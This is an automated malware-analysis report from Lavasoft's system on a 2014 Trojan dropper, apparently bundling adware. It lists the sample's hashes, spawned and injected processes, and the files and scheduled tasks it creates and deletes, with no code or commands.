Trojan.Win32.Alureon_b52ffef8dc

by malwarelabrobot on June 5th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.kvii (Kaspersky), Trojan.Win32.Alureon.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: b52ffef8dc3deccc384730fd88a102aa
SHA1: 7db8945f10f530e7d3a7118dce7e6bc36c25dfe0
SHA256: f98b8d2a709587bbd2eb46cb229218e1f5fd1378fa6b526598cccf34d3330c81
SSDeep: 24576:fOZ30HQlQlg6ZJVr9/hI j2bwOqq3eQ4Ede2/jGp6F:A0aQ66ZBhI j2b08T4EQI7
Size: 1015603 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Firseria
Created at: 2014-05-11 23:03:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:3772
GoogleUpdate.exe:3776
GoogleUpdate.exe:2432
GoogleUpdate.exe:2980
GoogleUpdate.exe:2700
GoogleUpdate.exe:1648
GoogleUpdate.exe:2176
GoogleUpdate.exe:3376
GoogleUpdate.exe:2792
GoogleUpdate.exe:2800
smu.exe:3500
smu.exe:3548
smu.exe:2884
34d16228-9e90-4879-9804-8e38b5180d78-4.exe:4036
yta.exe:3008
Ecixv.exe:3048
shopperpro.exe:2524
iwebar-buttonutil.exe:3200
sense.exe:3392
YouTubeAcceleratorService.exe:2072
YouTubeAcceleratorService.exe:2332
YouTubeAcceleratorService.exe:1952
GLB12.tmp:3040
bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe:3444
sc.exe:3340
iWebar-codedownloader.exe:2088
iWebar-codedownloader.exe:2412
iedw.exe:3480
Ixesxgrajdtli.exe:3116
Sense-codedownloader.exe:3148
Sense-codedownloader.exe:216
sma.exe:3780
sma.exe:620
sma.exe:4088
sma.exe:3724
sma.exe:3972
sma.exe:324
sma.exe:3056
sma.exe:3068
Udugcvjfj.exe:3492
setup.exe:264
testlsp.exe:2720
schtasks.exe:2756
schtasks.exe:2784
schtasks.exe:2976
schtasks.exe:1864
bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe:4020
sm.exe:2844
ShopperPro.exe:2564
34d16228-9e90-4879-9804-8e38b5180d78-2.exe:3468
iwebar.exe:3032
Object Browser-bg.exe:3272
GLJ15.tmp:3704
%original file name%.exe:220
regsvr32.exe:2616
regsvr32.exe:3068
regsvr32.exe:2176
regsvr32.exe:3004
sense-buttonutil.exe:3896
ca91e4a6-ab07-4dc2-9156-7c7e5962e962-2.exe:2904
Sense-bg.exe:2568
lspinst.exe:2404
lspinst.exe:2656
ca91e4a6-ab07-4dc2-9156-7c7e5962e962-3.exe:2460
wscript.exe:3432
dwwin.exe:2388
object browser-buttonutil.exe:3908
iWebar-bg.exe:3248
ca91e4a6-ab07-4dc2-9156-7c7e5962e962-4.exe:2720
cr.exe:2984
Object Browser-codedownloader.exe:600
Object Browser-codedownloader.exe:2148

The Trojan injects its code into the following process(es):

YouTubeAcceleratorService.exe:2516
YouTubeAccelerator.exe:3416
object browser-bg.exe:2252
iwebar-bg.exe:296
sense-bg.exe:1088

File activity

The process GoogleUpdate.exe:3776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar33.tmp (2712 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (888 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab32.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (892 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab32.tmp (0 bytes)

The process GoogleUpdate.exe:2980 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Install (0 bytes)

The process smu.exe:3548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\vup.tmp (90 bytes)
%Documents and Settings%\All Users\Application Data\SearchModule\smhe.js (439 bytes)
%WinDir%\Temp\SM_cache_iexplore.exe.cache (521 bytes)

The process smu.exe:2884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SMW_UpdateTask_Time_3835323735333432352d3437415a556c2a3223346c41.job (952 bytes)
%Documents and Settings%\All Users\Application Data\SearchModule\smhe.js (435 bytes)

The process yta.exe:3008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\GLB12.tmp (71 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\GLB12.tmp (0 bytes)

The process Ecixv.exe:3048 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils.dll (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Object Browser\Object Browser-buttonutil.dll (2321 bytes)
%Program Files%\Object Browser\Object Browser.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\223.js (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\184.js (1 bytes)
%Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\42.js (6 bytes)
%Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-5.exe (1425 bytes)
%Program Files%\Object Browser\Object Browser-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\78.js (3 bytes)
%WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\ExecDos.dll (5 bytes)
%Program Files%\Object Browser\Object Browser-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\19042 (209416 bytes)
%Program Files%\Object Browser\utils.exe (33376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\System.dll (11 bytes)
%Program Files%\Object Browser\Object Browser-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\211.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\35.js (9 bytes)
%WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-4.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\extension.js (5 bytes)
%Program Files%\Object Browser\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\StdUtils.dll (14 bytes)
%WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\217.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins.json (14 bytes)
%Program Files%\Object Browser\32850.xpi (3073 bytes)
%WinDir%\Tasks\bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\4.js (3312 bytes)
%Program Files%\Object Browser\Uninstall.exe (601 bytes)
%Program Files%\Object Browser\Object Browser-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd19.tmp (286014 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\354564 (780048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\93.js (793 bytes)
%Program Files%\Object Browser\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\123.js (889 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\102.js (1 bytes)
%WinDir%\Tasks\temp_bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\260.js (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.436922\GoogleUpdateHelper.msi (32 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\354564 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\217.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\19042 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\211.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\102.js (0 bytes)
%WinDir%\Tasks\temp_bb64c212-90f5-4d7e-87f7-ee5b0ade62fe-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\260.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1B.tmp\inetc.dll (0 bytes)

The process shopperpro.exe:2524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\ShopperPro\Updater.exe (24832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (7 bytes)
%Program Files%\ShopperPro\manifest.json (595 bytes)
%Program Files%\ShopperPro\database1_0_0.json (6 bytes)
%Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
%Program Files%\ShopperPro\SPRemove.exe (17848 bytes)
%Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (6 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.exe (102654 bytes)
%Program Files%\ShopperPro\ShopperPro.zip (1856 bytes)
%Program Files%\ShopperPro\ShopperPro64.dll (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (152650 bytes)
%Program Files%\ShopperPro\ShopperPro.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (102654 bytes)
%Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
%Program Files%\ShopperPro\ShopperPro.crx (1856 bytes)
%Program Files%\ShopperPro\FireFox\content\overlay.js (11 bytes)
%Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
%Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
%WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\jsdrv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\MoreInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsProcess.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsExec.dll (0 bytes)

The process sense.exe:3392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Udugcvjfj.exe (1067944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Muhrjqvszul.tmp (270219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn25.tmp (288289 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\WrapperUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Udugcvjfj.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Muhrjqvszul.tmp (0 bytes)

The process YouTubeAcceleratorService.exe:2516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\SBC35.tmp (98 bytes)
%WinDir%\Temp\SBC37.tmp (98 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2516_YouTubeAcceleratorService.log (159437 bytes)
%WinDir%\Temp\SBC5B.tmp (547 bytes)
%WinDir%\Temp\SBC38.tmp (44 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\va_conf.dat (706 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\config.xml (3153 bytes)
%WinDir%\Temp\SBC39.tmp (51193 bytes)
%WinDir%\Temp\SBC56.tmp (547 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_2516.log (591 bytes)
%WinDir%\Temp\SBC36.tmp (44 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\SBC35.tmp (0 bytes)
%WinDir%\Temp\SBC37.tmp (0 bytes)
%WinDir%\Temp\SBC5B.tmp (0 bytes)
%WinDir%\Temp\SBC38.tmp (0 bytes)
%WinDir%\Temp\SBC39.tmp (0 bytes)
